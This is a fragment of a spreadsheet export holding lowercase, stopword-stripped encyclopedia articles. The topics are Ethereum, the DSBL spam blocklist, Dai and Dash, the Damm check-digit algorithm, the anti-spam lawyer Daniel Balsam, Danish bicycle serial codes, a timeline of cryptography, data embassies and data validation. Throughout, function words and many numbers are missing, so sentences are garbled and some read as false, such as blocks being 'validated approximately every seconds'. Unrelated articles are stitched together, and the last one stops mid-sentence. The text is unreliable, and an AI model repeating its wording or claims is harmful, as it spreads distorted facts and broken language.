memory storage, data memory/storage added stack. isolated files processes node's computer ensure given pre-transaction state transaction, every node produces post-transaction state, thereby enabling network consensus. formal definition specified ethereum yellow paper. evms implemented c++, haskell, java, javascript, python, ruby, rust, elixir, erlang, soon webassembly. unit account within used calculation transaction fee, amount transaction's sender must miner includes transaction blockchain. each type operation performed hardcoded certain cost, intended roughly proportional amount resources (computation storage) node must expend perform operation. when sender creates transaction, sender must specify limit price. limit maximum amount sender willing transaction, price amount sender wishes miner unit used. higher price, incentive miner include transaction block, thus quicker transaction included blockchain. sender buys full amount (i.e. balance debited amount: limit price) up-front, start execution transaction, refunded unused gas. point transaction enough perform next operation, transaction reverted sender refunded unused gas. prices typically denominated gwei, subunit equal 10−9 eth.this mechanism designed mitigate transaction spam, prevent infinite loops contract execution, provide market-based allocation network resources. governance october 2015, development governance proposed ethereum improvement proposal (eip), standardized eip-1. core development group community gain consensus process-regulated eip. difficulty bomb difficulty bomb ethereum protocol feature causes difficulty mining block increase exponentially time certain block reached, intended purpose incentivize upgrades protocol prevent miners much control upgrades. protocol upgraded, difficulty bomb typically pushed time. protocol included difficulty bomb beginning, bomb pushed back several times. originally placed primarily ensure successful upgrade proof work proof stake, upgrade removes miners entirely design network. period mining difficulty increasing known "ice age". comparison bitcoin bitcoin's primary case store value digital currency. ether also used digital currency store value, ethereum network also makes possible create decentralized applications smart contracts. although bitcoin ethereum mined proof-of-work, ethereum blocks validated approximately every seconds opposed approximately every minutes bitcoin, ethereum relies slightly different mechanism called "modified ghost", based protocol created yonatan sompolinsky aviv zohar.additionally, bitcoin fixed supply 21,000,000 coins, whereas ether supply cap. both ether bitcoin purchased cryptocurrency exchanges. applications evm's instruction turing-complete. popular uses ethereum included creation fungible (erc20) non-fungible (erc721) tokens variety properties, crowdfunding (e.g. initial coin offerings), decentralized finance, decentralized exchanges, decentralized autonomous organizations (daos), games, prediction markets, gambling. contract source code ethereum's smart contracts written high-level programming languages compiled bytecode deployed ethereum blockchain. they written solidity language library similarities javascript), serpent (similar python, deprecated), intermediate language compile various different backends 1.0, 1.5, ewasm planned), low-level lisp-like language), mutan (go-based, deprecated). there also research-oriented language development called vyper strongly-typed python-derived decidable language). source code compiler information usually published along launch contract users code verify compiles bytecode on-chain. issue related using smart contracts public blockchain bugs, including security holes, visible cannot fixed quickly. example 2016 attack dao, could quickly stopped reversed.there ongoing research formal verification express prove non-trivial properties. microsoft research report noted writing solid smart contracts extremely difficult practice, using hack illustrate problem. report discussed tools microsoft developed verifying contracts, noted large-scale analysis published contracts likely uncover widespread vulnerabilities. report also stated possible verify equivalence solidity program code. erc-20 tokens erc-20 (ethereum request-for-comments #20) token standard allows fungible tokens ethereum blockchain. standard, proposed fabian vogelsteller november 2015, implements tokens within smart contracts. standard provides functions include transfer tokens account another, getting current token balance account, getting total supply token available network. smart contracts correctly implement erc-20 processes called erc-20 token contracts, keep track created tokens ethereum. numerous cryptocurrencies launched erc-20 tokens distributed initial coin offerings. fees send erc-20 tokens must paid ether. non-fungible tokens (nfts) ethereum also allows creation unique indivisible tokens, called non-fungible tokens (nfts). since tokens type unique, used represent things collectibles, digital art, sports memorabilia, virtual real estate, items within games. first project, etheria, tradable customizable hexagonal tiles, deployed network october 2015 demonstrated live devcon1 november year. 2021, christie's sold digital image beeple us$69.3 million, making third-most valuable living artist terms auction prices time, although observers noted buyer seller vested interest driving demand artist's work. land, buildings, avatars blockchain-based virtual worlds also bought sold nfts, sometimes hundreds thousands dollars. decentralized finance decentralized finance (defi) case ethereum. offers traditional financial instruments decentralized architecture, outside companies' governments' control, money market funds users earn interest. decentralized finance applications typically accessed web3-enabled browser extension application, metamask, allows users directly interact ethereum blockchain website. many dapps connect work together create complex financial services.examples defi platforms include makerdao compound. uniswap, decentralized exchange tokens ethereum grew us$20 million liquidity us$2.9 billion 2020. october 2020, us$11 billion invested various defi protocols. additionally, process called "wrapping", certain defi protocols allow synthetic versions various assets (such bitcoin, gold, oil) tradeable ethereum also compatible ethereum's major wallets applications. enterprise software ethereum-based software networks, independent public ethereum chain, tested enterprise software companies. interested parties include microsoft, ibm, jpmorgan chase, deloitte, innovate (cross-border payments prototype). barclays, ubs, credit suisse, amazon, visa, companies also experimenting ethereum. permissioned ledgers ethereum-based permissioned blockchain variants used investigated various projects: 2017, jpmorgan chase proposed developing coin permissioned-variant ethereum blockchain dubbed "quorum". "designed line private public realm shuffling derivatives payments. idea satisfy regulators need seamless access financial goings-on protecting privacy parties wish reveal identities details transactions general public." royal bank scotland announced built clearing settlement mechanism (csm) based ethereum distributed ledger smart contract platform. performance ethereum, smart contracts stored publicly every node blockchain, costs. being blockchain means secure design; example distributed computing system high byzantine fault tolerance. every transaction recorded block, connected previous future blocks chain. fraudsters want tamper transaction/block would tamper preceding following blocks, possible, extremely difficult.the downside performance issues arise every node calculates smart contracts real-time. january 2016, ethereum protocol could process transactions second. comparison, visa payment platform processes 45,000 payments second. this question scalability ethereum. december 2016, ethereum exceeded million transactions single first time. visa also signaled interest processing ethereum transactions.ethereum engineers working sharding calculations, next step (ethereum presented ethereum's devcon november 2017.ethereum's blockchain uses merkle trees security reasons, improve scalability, optimize transaction hashing. merkle tree implementation, allows storage savings, membership proofs (called "merkle proofs"), light client synchronization. network faced congestion problems, 2017 relation cryptokitties. regulation august 2022 digital commodities consumer protection announced government would treating ethereum cryptocurrencies commodities regulated commodity futures trading commission (cftc). environmental impact like cryptocurrencies, ethereum heavily criticised environmental impact. ethereum annually uses terawatt hours (twh) electrical energy carbon footprint megatons co2. single ethereum transaction uses kwh, comparable u.s. household uses workweek. ethereum promised bring environmental impact ethereum switching proof work proof stake, eliminate energy-wasting mining. notes references external links official website</t>
  </si>
  <si>
    <t>Distributed Sender Blackhole List</t>
  </si>
  <si>
    <t>distributed sender blackhole list domain name system-based blackhole list listed addresses insecure e-mail hosts. dsbl could used server administrators block e-mail messages came insecure servers, often spam. dsbl published lists domain name system (dns) zones could queried anyone internet. dsbl dead 2008. administrators continued authoritative nameservers several months decommissioning announcement; march 2009, even servers offline. point, using *.dsbl.org lookups check results failures even prevent smtp server starting conversation. blocking possible dsbl block intercept mail. e-mail sometimes blocked bounced message referencing dsbl. these messages blocked dsbl; blocked administrator receiving mail server, chose reject messages coming potentially-insecure address listed dsbl. dnsbl description mail transfer agents interact lists. methodology dsbl lists addresses hosts demonstrated insecure. dsbl defines insecure host allows e-mail sent anyone anyone else. normal servers send mail users anyone else. insecure servers commonly abused spammers, although dsbl claim hosts sent spam abused spammers; could dsbl builds lists receiving specially-formatted "listme" e-mails triggered testers. dsbl test hosts security vulnerabilities. testers software causes insecure servers send message e-mail address monitored dsbl. message includes time-sensitive cryptographically secure cookie prevent servers listed mistake. when valid listme message received dsbl adds address server delivered message lists. messages reach dsbl insecure server must allowed anyone dsbl tester) send mail anyone (dsbl's monitored address). this proof-of-vulnerability kept file dsbl's site. addition open mail relays, dsbl lists hosts vulnerable abuse formmail bugs, open proxies, problems. because testers available method trigger listme messages, adapt newly discovered vulnerabilities spammers testers normally perform tests hosts sent spam them. thus many addresses listed dsbl addresses servers abused spammers. delisting address removed dsbl's lists, administrator address must demonstrate "accountability" first requesting, responding, delisting message dsbl. message sent postmaster abuse desk listed address. postmaster's e-mail domain determined consulting reverse dns. until accountability test passed, host remains listed. thus possible addresses listed dsbl secured, still listed administrator demonstrated accountability requesting responding de-listing message. because dsbl perform vulnerability tests, criterion removal accountability test. entirely possible hosts delisted still vulnerable abuse. case, expected host relisted tester next time abused. problem delisting process dynamic dial-up ip-addresses make list never delisted since delisting would require smtp-server temporary dial-up another problem require smtp server running behind router allows packets marked bits. this require upgrade newest router software accountability email received. automated system credibility dsbl largely automated system. delisting process, particular, automated self-service page. manual processes used remove address list, except rare cases dsbl's software prevented delisting. dsbl's operators believe manual delisting processes would undermine list's credibility. lists dsbl operated three lists: unconfirmed.dsbl.org: unconfirmed list contains addresses hosts delivered listme messages triggered anonymous untrusted testers. dsbl recommend using list part blocking system. list.dsbl.org: trusted list contains addresses hosts delivered listme messages triggered trusted testers. multihop.dsbl.org: multihop list contains addresses hosts deliver mail insecure servers. servers list appear secure, abused spammers trust servers insecure. this category sometimes includes mail servers large isps, dsbl recommends using list part message scoring system, blocking list. external links dsbl site source code dsbl related software open relay test report dsbl</t>
  </si>
  <si>
    <t>Template talk:Password managers</t>
  </si>
  <si>
    <t>preceding unsigned comment added 117.20.116.241 (talk) 22:52, march 2022 (utc)reply[reply]</t>
  </si>
  <si>
    <t>Dai (cryptocurrency)</t>
  </si>
  <si>
    <t>dai, formerly sai) stablecoin cryptocurrency ethereum blockchain aims keep value close united states dollar (usd) possible system smart contracts decentralized participants contracts incentivize perform maintenance governance functions. maintained regulated makerdao, decentralized autonomous organization (dao) composed owners governance token, mkr, vote changes certain parameters smart contracts order ensure stability dai.together, makerdao considered first examples decentralized finance receive significant adoption. overview created overcollateralized loan repayment process facilitated makerdao's smart contracts form decentralized application. users deposit ether cryptocurrencies accepted collateral) able borrow value deposits receive newly generated dai. minimum collateralization ratio ether currently 150%, words, depositing $150 worth ether allows borrow (roughly equivalent $100). collateralization ratio loan falls minimum ratio, anyone call function contract liquidate loan receive percentage collateral reward.consequently repaying loan accrued interest, returned automatically destroyed collateral made available withdrawal. value said backed value underlying collateral held makerdao's smart contracts. controlling types accepted collateral, minimum collateralization ratios, interest rates borrowing storing dai, makerdao able control amount circulation, thus value.the power propose implement changes variables granted, code, holders token. owners governance token able vote proposed modifications equal proportion amount tokens hold. token also serves investment makerdao system. added interest borrowers back, loan's principal, used tokens market burn (i.e. destroy, permanently take circulation). this mechanism aims make deflationary correlation revenues lending dai. history makerdao formed 2014 danish entrepreneur rune christensen.on december 2017, associated smart contracts officially launched main ethereum network. price successfully kept close dollar first year existence, even though price ether, collateral available time, declined time period.in september 2018, venture capital firm andreessen horowitz invested million makerdao purchasing tokens.in 2018, makerdao formed maker foundation, copenhagen, serves help bootstrap ecosystem example, writing code needed platform function adapt.in 2019, makerdao experienced internal struggle whether integrate traditional financial system. christensen wanted greater regulatory compliance allow assets besides cryptocurrency serve collateral dai. struggle departure makerdao's cto.in march 2020, result extraordinary market volatility onset covid-19 pandemic, experienced deflationary deleveraging spiral that, peak, caused trade $1.11 returning intended $1.00 valuation. name according rune christensen name cryptocurrency based chinese character translated lend provide capital loan". also cryptocurrency stablecoin decentralized finance (defi) decentralized autonomous organization (dao) notes references external links makerdao.com</t>
  </si>
  <si>
    <t>Damm algorithm</t>
  </si>
  <si>
    <t>error detection, damm algorithm check digit algorithm detects single-digit errors adjacent transposition errors. presented michael damm 2004. strengths weaknesses strengths damm algorithm similar verhoeff algorithm. detect occurrences frequently appearing types transcription errors, namely altering single digit, transposing adjacent digits (including transposition trailing check digit preceding digit). damm algorithm benefit makes without dedicatedly constructed permutations position specific powers inherent verhoeff scheme. furthermore, table inverses dispensed provided main diagonal entries operation table zero. damm algorithm suffer exceeding number possible values, resulting need using non-digit character 10-digit isbn check digit scheme). prepending leading zeros affect check digit weakness variable-length codes).there totally anti-symmetric quasigroups detect phonetic errors associated english language ..., 90). table used illustrating example based instance kind. weaknesses checksum algorithms including damm algorithm, prepending leading zeroes affect check digit, 001, etc. produce check digit. consequently variable-length codes verified together. design essential part quasigroup order (i.e. latin square body operation table) special feature weakly totally anti-symmetric. damm revealed several methods create totally anti-symmetric quasigroups order gave examples doctoral dissertation. with this, damm also disproved conjecture totally anti-symmetric quasigroups order exist.a quasigroup called totally anti-symmetric following implications hold: y,and called weak totally anti-symmetric first implication holds. damm proved existence totally anti-symmetric quasigroup order equivalent existence weak totally anti-symmetric quasigroup order damm algorithm check equation (...((0 xm−1) ...) weak totally anti-symmetric quasigroup property needed. such quasigroup constructed totally anti-symmetric quasigroup rearranging columns zeros diagonal. and, hand, weak totally anti-symmetric quasigroup totally anti-symmetric quasigroup constructed rearranging columns first natural order. algorithm validity digit sequence containing check digit defined quasigroup. quasigroup table ready taken damm's dissertation (pages 106, 111). useful main diagonal entry simplifies check digit calculation. validating number included check digit interim digit initialize process number digit digit: number's digit column index interim digit index, take table entry replace interim digit number valid resulting interim digit value calculating check digit prerequisite: main diagonal entries table interim digit initialize process number digit digit: number's digit column index interim digit index, take table entry replace interim digit resulting interim digit gives check digit appended trailing digit number. example following operation table used. obtained totally anti-symmetric quasigroup damm's doctoral dissertation page rearranging rows changing entries permutation defining φ−1(φ(x) suppose choose number (digit sequence) 572. calculating check digit resulting interim digit this calculated check digit. append number obtain 5724. validating number included check digit resulting interim digit hence number valid. graphical illustration this example showing detail algorithm generating check digit (dashed blue arrow) verifying number check digit. references external links damm validation generation code several programming languages practical application singapore quasigroups damm algorithm order rosettacode.org, implementations damm algorithm many programming languages</t>
  </si>
  <si>
    <t>Daniel Balsam</t>
  </si>
  <si>
    <t>daniel balsam american lawyer best known lawsuits e-mail spammers violations internet spam laws. balsam filing lawsuits spammers since 2002 earned million court judgments. filing lawsuits, balsam aims publicize names principals profiting spam advertising. aims make spamming less profitable cause companies reconsider decision market products spam. balsam describes practice "cleaning internet," although critics accuse taking advantage legal system. legal practice balsam decided begin suing spammers became enraged volume breast enlargement spam received working marketing. began filing lawsuits small claims court 2002, initially seeing lawsuits hobby. balsam soon decided make vocation attended university california, hastings college law, graduated 2008.by time graduated school, balsam filed several dozen lawsuits. files lawsuits based spam receives e-mail addresses. makes enough money court judgments support full-time. with help attorney, timothy walton, judgments $1,000 e-mail. because spam messages identify company sending message, often difficult identify source. balsam frequently faced fictitious business names registered post office boxes. balsam awarded $1.125 million verdict pornography company sent 1,125 e-mails. able collect judgment, however, domain registrar tucows refused identify owner company sent spam.most balsam's lawsuits brought california's anti-spam laws. although many cases tried small claims court, filed first spam lawsuit brought trial california superior court—balsam trancos inc.—which currently appeal.among companies balsam sued small claims court various inc. adult friendfinder, tagged.com, deniro marketing amateurmatch, stockton asparagus festival. lobbying balsam critical can-spam act, arguing tough enough spammers. also believes u.s. government enough enforce laws spam. while still school, balsam helped draft bill 2950) sponsored california state assemblyman jared huffman, would toughened california's anti-spam laws. bill aimed close proponents characterized loopholes tighten ambiguous language business professions code 17529.5 clearly forth practices unlawful, make easier bring lawsuits deceptive spammers spamvertisers. although bill passed state assembly, governor arnold schwarzenegger vetoed opposition bennet kelley, internet lawyer balsam faced court, vocally critical balsam's tactics.balsam also sued valueclick, inc., twice bloosky interactive, llc, allegedly violating settlement confidentiality and/or non-disparagement agreements shortly entering settlement. balsam maintains suits retaliatory. also anti-spam techniques cost-based anti-spam systems references external links daniel balsam's website</t>
  </si>
  <si>
    <t>Danish bicycle VIN-system</t>
  </si>
  <si>
    <t>danish bicycle vin-system system introduced 1942 danish government, providing bicycles denmark unique code. code combination letters digits embedded bicycle frame consists manufacturer code, serial number, construction year code. since 1948, illegal sell bicycle frames denmark without embedded vin. because this, insurance companies denmark indemnities stolen bicycles without vin. location default, engraved seat tube tube, made material hinders this, alternately bottom bracket shell. special instances, approval danish national police commissioner’s office, applied means locations. components bicycle constructed three elements: letter-block, digit-block letter-block: manufacturers-code, 4-letter block. code starts imported bicycle frame. second block frame serial number manufacturer. this shall least digit, otherwise number digits. third block single letter code identifies production year. certain limits regarding letters instated vin: omitted confused (one) omitted confused (zero) omitted confused omitted, avoid confusion manufacturer code (where reserved imported frames)in examples above, first bicycle bicycle imported fdb, serial number 1234 made either 1963, 1984 2005. second bike bicycle, serial number made 1942, 1964, 1985 2006. common manufacturer codes this table shows examples manufacturer codes, considered complete listing. even though general used, appears brands using it.2: even though general used, ebsen danmark bicycles fact using manufacturercode (verified).3: even though general used, appears brands using raleigh variant example different manufacturers code system found 1954 raleigh. example, prefix (w:import,ar:raleigh) instead represented smaller font section previously reported variant, presumed earlier listed above, extra stamped much smaller different font not. this stamp matches frame number prefix stamped raleigh frame time manufacture. that system (for export frames) rolling alphabetical progression began ticked number reached aa99999. az99999 went this progression reached 1954. quite clear variant danish serial simply prefix raleigh stamped frame number, point abandoned favour standard raleigh code production year identification codes please note since table compiled, found raleigh frame made march 1978. this obviously calls question entries letters also confirms years accurate. also bicycle locker bicycle theft list bicycle registers outline cycling references</t>
  </si>
  <si>
    <t>Timeline of cryptography</t>
  </si>
  <si>
    <t>below timeline notable events related cryptography. b.c. 36th century sumerians develop cuneiform writing egyptians develop hieroglyphic writing. 16th century phoenicians develop alphabet 600-500 hebrew scholars make simple monoalphabetic substitution ciphers (such atbash cipher) spartan scytale (alleged) herodotus reports steganography reports greece persia (tattoo shaved head) 100-1 a.d.- notable roman ciphers caesar cipher. 1–1799 a.d. 801–873 a.d. cryptanalysis frequency analysis leading techniques breaking monoalphabetic substitution ciphers developed manuscript deciphering cryptographic messages muslim mathematician, al-kindi (alkindus), inspired textual analysis qur'an. also covers methods encipherments, cryptanalysis certain encipherments, statistical analysis letters letter combinations arabic. 1355-1418 ahmad al-qalqashandi writes subh al-a 'sha, 14-volume encyclopedia including section cryptology, attributed al-durayhim (1312–1361). list ciphers work include substitution transposition, first time, cipher multiple substitutions plaintext letter. also included exposition worked example cryptanalysis, including tables letter frequencies sets letters cannot occur together word. 1450 chinese develop wooden block movable type printing. 1450–1520 voynich manuscript, example possibly encoded illustrated book, written. 1466 leon battista alberti invents polyalphabetic cipher, also first known mechanical cipher machine 1518 johannes trithemius' book cryptology 1553 bellaso invents vigenère cipher 1585 vigenère's book ciphers 1586 cryptanalysis used spymaster francis walsingham implicate mary, queen scots, babington plot murder elizabeth england. queen mary eventually executed. 1641 wilkins' mercury (english book cryptology) 1793 claude chappe establishes first long-distance semaphore telegraph line 1795 thomas jefferson invents jefferson disk cipher, reinvented years later etienne bazeries 1800–1899 1809–14 george scovell's work napoleonic ciphers peninsular 1831 joseph henry proposes builds electric telegraph 1835 samuel morse develops morse code 1854 charles wheatstone invents playfair cipher 1854 babbage's method breaking polyalphabetic ciphers (pub 1863 kasiski) 1855 english side crimean war, charles babbage broke vigenère's autokey cipher (the 'unbreakable cipher' time) well much weaker cipher called vigenère cipher today. secrecy also discovered attributed somewhat later prussian friedrich kasiski. 1883 auguste kerckhoffs' cryptographie militare published, containing celebrated laws cryptography 1885 beale ciphers published 1894 dreyfus affair france involves cryptography, misuse, regard false documents. 1900–1949 1916-1922 william friedman elizebeth smith friedman apply statistics cryptanalysis (coincidence counting, etc.), write riverbank publications 1917 gilbert vernam develops first practical implementation teletype cipher, known stream cipher and, later, joseph mauborgne one-time 1917 zimmermann telegram intercepted decrypted, advancing u.s. entry world 1919 weimar germany foreign office adopts manual) one-time traffic 1919 edward hebern invents/patents first rotor machine design—damm, scherbius koch follow patents year 1921 washington naval conference u.s. negotiating team aided decryption japanese diplomatic telegrams 1924 (herbert yardley, al.) provide breaks assorted traffic support position washington naval conference 1932 first break german army enigma marian rejewski poland 1929 united states secretary state henry stimson shuts state department cryptanalysis "black chamber", saying "gentlemen read other's mail." 1931 american black chamber herbert yardley published, revealing much american cryptography 1940 break japan's purple machine cipher team december 1941 attack pearl harbor; u.s. navy base pearl harbor oahu surprised japanese attack, despite u.s. breaking japanese codes. u.s. enters world june 1942 battle midway u.s. partial break edition jn-25 leads turning-point victory japan april 1943 admiral yamamoto, architect pearl harbor attack, assassinated u.s. forces know itinerary decoded messages april 1943 newman, wynn-williams, team (including alan turing) secret government code cypher school ('station x'), bletchley park, bletchley, england, complete "heath robinson". this specialized machine cipher-breaking, general-purpose calculator computer. december 1943 colossus computer built, thomas flowers post office research laboratories london, crack german lorenz cipher (sz42). colossus used bletchley park world successor april's 'robinson's. although eventually built, unfortunately destroyed immediately finished work advanced possibility design falling wrong hands. 1944 patent application filed sigaba code machine used u.s. world kept secret, finally issues 2001 1946 venona project's first break soviet espionage traffic early 1940s 1948 claude shannon writes paper establishes mathematical basis information theory. 1949 shannon's communication theory secrecy systems published bell labs technical journal 1950–1999 1951 u.s. national security agency founded. kl-7 rotor machine introduced sometime thereafter. 1957 first production order kw-26 electronic encryption system. august 1964 gulf tonkin incident leads u.s. vietnam war, possibly misinterpretation signals intelligence nsa. 1967 david kahn's codebreakers published. 1968 john anthony walker walks soviet union's embassy washington sells information kl-7 cipher machine. walker ring operates 1985. 1969 first hosts arpanet, internet's ancestor, connected. 1970 using quantum states encode information first proposed: stephen wiesner invents conjugate coding applies design “money physically impossible counterfeit” (still technologically unfeasible today). 1974? horst feistel develops feistel network block cipher design. 1976 data encryption standard published official federal information processing standard (fips) united states. 1976 diffie hellman publish directions cryptography. 1977 public encryption invented. 1978 robert mceliece invents mceliece cryptosystem, first asymmetric encryption algorithm randomization encryption process. 1981 richard feynman proposed quantum computers. main application mind simulation quantum systems, also mentioned possibility solving problems. 1984 based stephen wiesner's idea 1970s, charles bennett gilles brassard design first quantum cryptography protocol, bb84. 1985 walker ring uncovered. remaining kl-7's withdrawn service. 1986 after increasing number break-ins government corporate computers, united states congress passes computer fraud abuse act, makes crime break computer systems. law, however, cover juveniles. 1988 african national congress uses computer-based one-time pads build network inside south africa. 1989 berners-lee robert cailliau built prototype system became world wide cern. 1989 quantum cryptography experimentally demonstrated proof-of-the-principle experiment charles bennett 1991 phil zimmermann releases public encryption program along source code, quickly appears internet. 1994 bruce schneier's applied cryptography published. 1994 secure sockets layer (ssl) encryption protocol released netscape. 1994 peter shor devises algorithm lets quantum computers determine factorization large integers quickly. this first interesting problem quantum computers promise significant speed-up, therefore generates interest quantum computers. 1994 computing proof concept travelling salesman problem; method input/output still determined. 1994 russian crackers siphon million citibank transfer money bank accounts around world. vladimir levin, 30-year-old ringleader, uses work laptop hours transfer funds accounts finland israel. levin stands trial united states sentenced three years prison. authorities recover $400,000 stolen money. 1994 formerly proprietary, un-patented, cipher algorithm published internet. 1994 first factoring challenge 1977 decrypted magic words squeamish ossifrage. 1995 publishes sha1 hash algorithm part digital signature standard. july 1997 openpgp specification (rfc 2440) released 1997 ciphersaber, encryption system based simple enough reconstructed memory, published usenet. october 1998 digital millennium copyright (dmca) becomes u.s., criminalizing production dissemination technology circumvent technical measures taken protect copyright. october 1999 decss, computer program capable decrypting content dvd, published internet. 2000 beyond january 2000 u.s. government announce restrictions export cryptography relaxed (although removed). this allows many companies stop long running process create international copies software. march 2000 president united states bill clinton says e-mail communicate daughter, chelsea clinton, college think medium secure. september 2000 security inc. released algorithm public domain, days advance u.s. patent 4,405,829 expiring. following relaxation u.s. government export restrictions, removed last barriers worldwide distribution much software based cryptographic systems 2000 regulation investigatory powers requires anyone supply cryptographic duly authorized person request 2001 belgian rijndael algorithm selected u.s. advanced encryption standard (aes) five-year public search process national institute standards technology (nist) 2001 scott fluhrer, itsik mantin shamir publish attack wifi's wired equivalent privacy security layer september 2001 u.s. response terrorist attacks hampered lack secure communications november 2001 microsoft allies "full disclosure" security vulnerabilities replacing "responsible" disclosure guidelines 2002 nessie project releases final report selections august 2002, corporation formed, purchasing assets nai. 2003 cryptrec project releases 2003 report recommendations 2004 hash shown vulnerable practical collision attack 2004 first commercial quantum cryptography system becomes available quantique. 2005 potential attacks sha1 demonstrated 2005 agents u.s. demonstrate ability crack using publicly available tools 2007 users swamp digg.com copies 128-bit aacs system used protect blu-ray video discs. user revolt response digg's decision, subsequently reversed, remove keys, demands motion picture industry cited u.s. dmca anti-circumvention provisions. november 2007 nist hash function competition announced. 2009 bitcoin network launched. 2010 master high-bandwidth digital content protection (hdcp) private signing sony playstation game console recovered published using separate cryptoanalytic attacks. corp. acquired symantec. 2012 nist selects keccak algorithm winner sha-3 hash function competition. 2013 edward snowden discloses vast trove classified documents nsa. global surveillance disclosures (2013–present) 2013 dual_ec_drbg discovered backdoor. 2013 publishes simon speck lightweight block ciphers. 2014 password hashing competition accepts entries. 2015 year nist suggests 80-bit keys phased out. also history cryptography references external links timeline cipher machines</t>
  </si>
  <si>
    <t>Dash (cryptocurrency)</t>
  </si>
  <si>
    <t>dash open source cryptocurrency. altcoin forked bitcoin protocol. also decentralized autonomous organization (dao) subset users, called "masternodes". history currency launched january 2014 "xcoin" evan duffield, fork bitcoin protocol. altcoin early days subject pump dump speculation. rebranded darkcoin, received press used dark markets. march 2015, rebranded name dash portmanteau 'digital cash'. august 2016, dash longer used major dark markets worth noting.in early 2017 duffield, lived phoenix area, people working dash took space business incubator arizona state university. dash later funded blockchain research asu.as april 2018, dash's market capitalization around $4.3 billion cryptocurrencies.as february 2019, dash popular cryptocurrency venezuela according spiegel. design governance dash designed allow transactions quickly swift governance structure order overcome shortfalls bitcoin. what makes dash different bitcoin splits rewards three categories: goes miners, goes masternodes (these computers additional services network significant investment dash tokens), goes towards decentralized governance budget. governance governance handled form decentralized autonomous organization decisions made blockchain masternodes. masternodes perform standard node functions like hosting copy blockchain, relaying messages, validating transactions network, addition shareholders, voting proposals improving dash's ecosystem. anyone 1,000 dash coins (dash), protocols native cryptocurrency, become masternode owner. along masternodes, system includes standard nodes miners. system's decentralization criticized mishap, allowed many coins distributed release. this concentrated wealth small group, giving disproportionate power decisions currency’s future. consensus 2018, coins mined using proof work algorithm hash function called "x11", eleven rounds hashing, average time mine coin around half minutes.masternodes provide additional kinds transactions. "instantsend" bypasses mining instead requires consensus masternodes validate transaction, speeding transactions. "privatesend" intended give users optional consumer-grade privacy; mixes participating users' unspent dash executing transaction. references external links official website</t>
  </si>
  <si>
    <t>Data Security Threats Database</t>
  </si>
  <si>
    <t>data security threats database (russian: банк данных угроз безопасности информации, bdu) russian federation's national vulnerability database. maintained russian federal service technical export control. 2018, contained roughly one-tenth number entries corresponding u.s. national vulnerability database. references</t>
  </si>
  <si>
    <t>Data embassy</t>
  </si>
  <si>
    <t>data embassy solution traditionally implemented nation states ensure country's digital continuity particular respect critical databases. consists servers store country's data country's jurisdiction located another country. purpose data embassies regarded tool ensure government's digital continuity, meaning survival critical databases allow continuation government even situation governing within country's borders longer option. among threats might lead situation natural disasters, large-scale cyberattacks, military invasion. worst-case scenario, data embassy could enable government provide digital services without national territory control. this makes data embassies particularly attractive countries already digitalized crucial databases situated vicinity aforementioned threat vectors. additionally, data embassies offer additional computing power heightened server traffic, example election season period electronic return filing. history 2007 cyberattacks estonia disrupted websites estonian organizations including estonian parliament well newspapers banks. furthermore, estonia implemented stringent paperless policy, meaning many crucial databases exist digital format. tasked ensuring security immutability databases, ministries looked towards data embassies possible solution digital continuity. this crucial estonia's citizens also e-residents rely services around world. these efforts also written estonian cyber security strategy 2014-2017 created outline ensuring digital continuity state.in 2013, then-cio estonian government taavi kotka made active efforts determine, constellation data embassy would useful effective. estonian government also collaborated microsoft studies determine feasibility virtual data embassies. government decided option converting selected estonian embassies data embassies embassies possess necessary technical crisis response competence, reliant whatever telecommunications services would offered virtue environment, physically constructed according safety criteria datacenters could fulfil. november 2016, estonian ministry economic affairs communications luxembourgish ministry media communications signed memorandum understanding hosting data information systems. june 2017, prime minister estonia jüri ratas prime minister luxembourg xavier bettel signed agreement establish estonian data embassy luxembourg. this agreement ratified parliaments luxembourg estonia 2018. first iteration, estonian data embassy luxembourg currently acts backup source additional computing power following datasets considered critical functioning state: e-file court system, treasury information system, e-land register, taxable persons’ register, business register, population register, state gazette, identity documents register, land cadastral register, national pension insurance register.in 2018, kingdom bahrain implemented so-called cloud allows data stored bahraini datacenters subject domestic third country. legal basis initially, academic research also considered application 1963 vienna convention consular relations 1961 vienna convention diplomatic relations ensure protection inviolability data found conventions would require significant changes. result lack international legal precedent, data embassies thus created basis bilateral agreements inspired wording used vienna conventions. these bilateral agreements also usually require ratification parliaments partnering countries. sources</t>
  </si>
  <si>
    <t>Data validation</t>
  </si>
  <si>
    <t>computer science, data validation process ensuring data undergone data cleansing ensure data quality, correct useful. uses routines, often called "validation rules", "validation constraints", "check routines", check correctness, meaningfulness, security data input system. rules implemented automated facilities data dictionary, inclusion explicit application program validation logic computer application. this distinct formal verification, attempts prove disprove correctness algorithms implementing specification property. overview data validation intended provide certain well-defined guarantees fitness consistency data application automated system. data validation rules defined designed using various methodologies, deployed various contexts. their implementation declarative data integrity rules, procedure-based business rules.note guarantees data validation necessarily include accuracy, possible data entry errors misspellings accepted valid. other clerical and/or computer controls applied reduce inaccuracy within system. different kinds evaluating basics data validation, generalizations made regarding different kinds validation according scope, complexity, purpose. example: data type validation; range constraint validation; code cross-reference validation; structured validation; consistency validation data-type check data type validation customarily carried simple data fields. simplest kind data type validation verifies individual characters provided user input consistent expected characters known primitive data types defined programming language data storage retrieval mechanism. example, integer field require input characters simple range constraint check simple range constraint validation examine input consistency minimum/maximum range, consistency test evaluating sequence characters, tests regular expressions. example, counter value required non-negative integer, password required meet minimum length contain characters multiple categories. code cross-reference check code cross-reference validation includes operations verify data consistent possibly-external rules, requirements, collections relevant particular organization, context underlying assumptions. these additional validity constraints involve cross-referencing supplied data known look-up table directory information service ldap. example, user-provided country code might required identify current geopolitical region. structured check structured validation allows combination kinds validation, along complex processing. such complex processing include testing conditional constraints entire complex data object process operations within system. consistency check consistency validation ensures data logical. example, delivery date order prohibited preceding shipment date. example multiple kinds data validation relevant 10-digit pre-2007 isbns (the 2005 edition 2108 required isbns digits 2007 onwards). size. pre-2007 isbn must consist digits, optional hyphens spaces separating four parts. format checks. each first digits must 10th must either check digit. detect transcription errors digits altered transposed, last digit pre-2007 isbn must match result mathematical formula incorporating digits (isbn-10 check digits). validation types allowed character checks checks ascertain expected characters present field. example numeric field allow digits 0–9, decimal point perhaps minus sign commas. text field personal name might disallow characters used markup. e-mail address might require least sign various structural details. regular expressions effective ways implement checks.batch totals checks missing records. numerical fields added together records batch. batch total entered computer checks total correct, e.g., 'total cost' field number transactions together.cardinality check checks record valid number related records. example, contact record classified "customer" must least associated order (cardinality this type rule complicated additional conditions. example, contact record payroll database classified "former employee" must associated salary payments separation date (cardinality 0).check digits used numerical data. support error detection, extra digit added number calculated digits.consistency checks checks fields 